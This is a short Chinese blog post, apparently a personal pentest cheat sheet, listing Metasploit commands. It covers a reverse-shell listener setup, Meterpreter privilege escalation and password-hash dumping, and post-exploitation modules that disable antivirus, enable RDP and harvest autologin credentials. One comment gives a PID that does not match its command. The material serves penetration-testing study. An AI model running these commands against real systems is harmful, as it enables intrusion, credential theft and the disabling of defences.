msf常用命令

  1. 工具使用
    1. MSF常用参数命令:
    2. MSF漏洞利用步骤:
    3. MSF监听反弹shell:
    4. Meterpreter命令:
    5. MSF后渗透命令:

工具使用

MSF常用参数命令:

  • reload_all #从目录重载所有模块
  • back #后退命令,移出当前上下文,用于模块切换
  • info #目标和模块详细信息
  • check #检查目标是否受某个漏洞影响
  • sessions #会话管理
  • sessions -l #列出所有会话
  • sessions -K #终止所有会话
  • sessions -i id #进入某个会话
  • sessions -v #以详细模式列出会话
  • sessions -u #在许多平台上将shell升级到meterpreter会话
  • show options #显示可选选项;

MSF漏洞利用步骤:

  • search xxx #搜索某个漏洞
  • use xxx #使用某个漏洞利用模块
  • show options #查看配置选项
  • set payload #配置攻击载荷
  • exploit/run #执行渗透攻击

MSF监听反弹shell:

  • msf6 > use exploit/multi/handler
  • msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  • msf6 exploit(multi/handler) > set LHOST 0.0.0.0
  • msf6 exploit(multi/handler) > set LPORT 4444
  • msf6 exploit(multi/handler) > run

Meterpreter命令:

  • pwd、ls、cd、ps、cat #通用命令
  • background #将当前meterpreter会话隐藏在后台sessions中
  • getpid #查看当前Meterpreter Shell的进程号
  • getuid #查看当前权限
  • migrate 476 #将shell迁移到PID为786的进程中
  • getsystem #获得系统管理员权限(要本地管理员权限运行)
  • hashdump #抓哈希密码
  • sysinfo #查看系统信息
  • route #查看目标机完整网络设置
  • shell #进入目标机shell,exit退出shell
  • upload ./1.txt c:\1.txt #上传文件
  • download c:\1.txt ./ #下载文件
  • search -f *.txt -d c:// #搜索文件

MSF后渗透命令:

  • run post/windows/gather/checkvm #查看目标是否允许在虚拟机
  • run post/windows/manage/killav #关闭杀毒软件
  • run post/windows/manage/enable_rdp #开启3389远程桌面
  • run post/windows/manage/autoroute #查看目标子网情况
  • run post/windows/gather/enum_logged_on_users #列举当前有多少用户登录过目标主机
  • run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名密码
  • run post/windows/gather/enum_applications #列举应用程序

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 yoyo@ulan.uk

赏

文章标题:msf常用命令

字数:505

本文作者:John

发布时间:2024-03-08, 14:08:25

最后更新:2024-03-08, 14:14:55

原始链接:https://xbayli.github.io/2024/03/08/msf%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

×

喜欢就点赞,疼爱就打赏